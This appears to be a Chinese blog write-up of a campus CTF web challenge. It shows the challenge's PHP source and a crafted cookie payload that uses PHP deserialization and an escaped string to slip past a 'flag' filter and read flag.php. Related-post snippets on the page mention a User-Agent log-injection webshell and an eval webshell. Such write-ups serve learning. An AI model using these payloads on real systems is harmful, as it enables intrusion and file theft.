校赛Hodor

最新推荐文章于 2024-06-11 09:58:10 发布
最新推荐文章于 2024-06-11 09:58:10 发布
阅读量118 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43774856/article/details/110391761
版权

校赛Hodor

打开链接,如图所示

在这里插入图片描述
查看源码
在这里插入图片描述
get方式传入source,得到源码

<?php

Class Source {
    public function __toString() {
        return highlight_file('license.txt', true).highlight_file($this->source, true);
    }
}

function easy_check($str) {
    //echo $str;
    if (preg_match("/flag/i", $str, $matches)) {
        return false;
    }
    return true;
}

if(isset($_GET['source'])){
    $s = new Source();
    $s->source = __FILE__;

    echo $s;
    exit;
}

$todos = [];

if(isset($_COOKIE['todos'])){
    if(!easy_check($_COOKIE['todos'])) {
        echo "Hacker!\n";
    } else {
        $c = $_COOKIE['todos'];
        $h = substr($c, 0, 32);
        $m = substr($c, 32);
        if(md5($m) === $h){
            $todos = unserialize($m);
        }
    }
}

if(isset($_POST['text'])){
    $todo = $_POST['text'];

    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);

    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
// flag is in flag.php
?>

构造payload

cookie:todos=df80635527eb9189c1197254ad3c46bca%3A1%3A%7Bi%3A0%3BO%3A6%3A%22Source%22%3A1%3A%7Bs%3A6%3A%22source%22%3BS%3A8%3A%22%5C66lag.php%22%3B%7D%7D
str='a:1:{i:0;O:6:"Source":1:{s:6:"source";S:8:"\66lag.php";}}';//S 大写,为了识别\66

最后得到flag
在这里插入图片描述

yjj哈哈哈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hodor-scripts
06-28
hodor-scripts
hodor:极简、简单且易于使用的客户端路由提供程序
07-14
hodor.js 简约、简单且易于使用的客户端路由提供程序。 用法 < script src =" https://cdn.rawgit.com/victorzki/hodor/master/dist/hodor-min-0.0.1.js " > </ script > 笔记 该库利用 ajax 加载引用的 html 页面。 因此,为了运行此库,您需要使用 Web 服务器进行备份。 应用程序接口 hodor.use(templateEngine)指定模板引擎。 hodor.use(path, file)将路径映射到文件 hodor.use(path, file, settings)将路径映射到文件并注入设置(模板时使用) 需要具有属性data-hodor div。 这是注入视图的地方! 依赖关系 示例设置 var app = new hodor ( ) ; app . us
ctfshow web29-38(命令执行)
y4615184的博客
09-08 476
ctfshow web入门 29-38(命令执行)
探秘Hodor:一个简洁高效的Python轻量级HTTP客户端
gitblog_00013的博客
04-22 324
探秘Hodor:一个简洁高效的Python轻量级HTTP客户端 项目地址:https://gitcode.com/bpascal/Hodor Hodor 是一个由开发者bpascal创建的轻量级Python HTTP客户端库,它的设计目标是简化日常的HTTP请求操作,提供一种快速、易用且灵活的接口。在本文中,我们将深入探讨Hodor的技术特性,应用场景和优势,让你了解为何它值得成为你的开发工具箱中...
kaggle比集成指南
热门推荐
Jie Qiao的专栏
11-11 3万+
集成模型是一种能在各种的机器学习任务上提高准确率的强有力技术。在这篇文章中,我会分享我在Kaggle比中的集成方法。 在第一部分中,我们会讨论从提交文件中建立集成。主要包括: 投票集成 平均 排名平均 第二部分我们会讨论 通过 generalization/blending等方法来创建集成。 我会在后续回答为什么集成能够减少泛化误差。最后我会展示不同的集成方法,包括它们的结果以及代码
探索Hodor:一个简化Docker开发流程的神器
最新发布
gitblog_00008的博客
06-11 314
探索Hodor:一个简化Docker开发流程的神器 项目地址:https://gitcode.com/gansbrest/hodor 1、项目介绍 Hodor是一个小巧而强大的工具,旨在为在OS X(Boot2Docker/Docker Machine)和Linux上使用Docker的开发者提供流畅的工作流程。它通过自动化和优化某些繁琐的任务,让你可以专注于代码本身而不是环境配置。 2、项目技术分...
kaggle比模型融合指南
一路前行
10-13 1万+
介绍集成模型是一种能在各种的机器学习任务上提高准确率的强有力技术。在这篇文章中,我会分享我在Kaggle比中的集成方法。在第一部分中,我们会讨论从提交文件中建立集成。主要包括: 投票集成 平均 排名平均 第二部分我们会讨论 通过 generalization/blending等方法来创建集成。我会在后续回答为什么集成能够减少泛化误差。最后我会展示不同的集成方法,包括它们的结果以及代码以供你自己去尝
推荐开源项目:Hodor - 简洁快速的iOS应用本地化工具
gitblog_00056的博客
05-20 395
推荐开源项目:Hodor - 简洁快速的iOS应用本地化工具 项目地址:https://gitcode.com/Aufree/Hodor 你是否曾因iOS应用的多语言支持而烦恼?Hodor提供了一个简单且高效的解决方案,让你的应用像微信那样,可以轻松在应用内部切换语言环境,无需用户退出再进入。这个由著名开发者Aufree领导的团队所打造的开源项目,已经吸引了众多开发者的眼球。 项目介绍 Hodo...
Kaggle比模型融合方法
WangR0120的博客
11-29 697
介绍 集成模型是一种能在各种的机器学习任务上提高准确率的强有力技术。在这篇文章中,我会分享我在Kaggle比中的集成方法。 在第一部分中,我们会讨论从提交文件中建立集成。主要包括: 投票集成 平均 排名平均 第二部分我们会讨论 通过 generalization/blending等方法来创建集成。 我会...
Hodor-crx插件
04-06
语言:English hodor hodorify您的网页!... 此扩展将每个网页的每个短语用单词“hodor”:) 版本中的新版本0.0.2:您可以单击分机的图标(HODOR的脸部)以启用或禁用该应用程序(在单击后,您需要重新加载网页)。
hodor:纯Rust中zkSTARK的开源实现
05-05
霍多尔开源zkSTARK在主要字段上实现。 最初的重点应该放在高效的证明程序实现上,之后再开发用于AIR表示合成的工具。发布细节Matter Labs已申请在Devcon5上展示开源zkSTARK证明者,计划于9月初/中旬开放。...
HODOR:用于对象重新分割的高级对象描述符从静态图像中学习的视频;利用XAI技术改进基于自动编码器的shapley加法解释计算机网络异常检测模型;基于超导纳米线的神经形态计算体系结构
weixin_39786820的博客
07-12 680
AI论文精粹
1304. 和为零的N个唯一整数
Hodor's AI Dream
04-08 103
力扣原题链接 1304. 和为零的N个唯一整数 class Solution { public: vector<int> sumZero(int n) { vector<int> ans; int sum=0; //核心:因为要求都不相同,所以构造的时候分为正负即可,先添加n-1个自然数,最后一个负数调平 fo...
攻防世界favorite_number
qq_43774856的博客
12-05 843
favorite_number 打开链接得到源码 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc
Header:请求头参数详解
qq_43774856的博客
12-01 795
Header:请求头参数详解 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzip Accept-Language 浏览器可接受的语言 Accept
攻防世界Confusion1
qq_43774856的博客
12-09 766
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
ctf.show_web4
qq_43774856的博客
11-30 536
ctf.show_web4 打开链接,如图所示 测试文件包含未成功 采用日志注入,查看日志默认路径 ?url=/var/log/nginx/access.log 这里需要把一句话木马加在User-Agent里 用蚁剑连接,得到flag
VulnCMS
qq_43774856的博客
11-30 504
VulnCMS 打开链接得到一个网页。 找到了两处可以读取任意文件的地方。 根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin,进入管理员界面后,如图所示。 发现输入命令的地方。 > echo '<?php @eval($_POST["fe1w0"]);phpinfo();?&gt
国内开源的低代码开发平台有哪些
05-19
6. Hodor:基于Python的自动化测试平台,提供低代码的测试用例设计和执行功能。 7. WeFlow:基于Vue.js的前端开发工具,提供低代码的UI设计和组件库。 这些开源的低代码开发平台在不同的领域和场景下都有着广泛的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值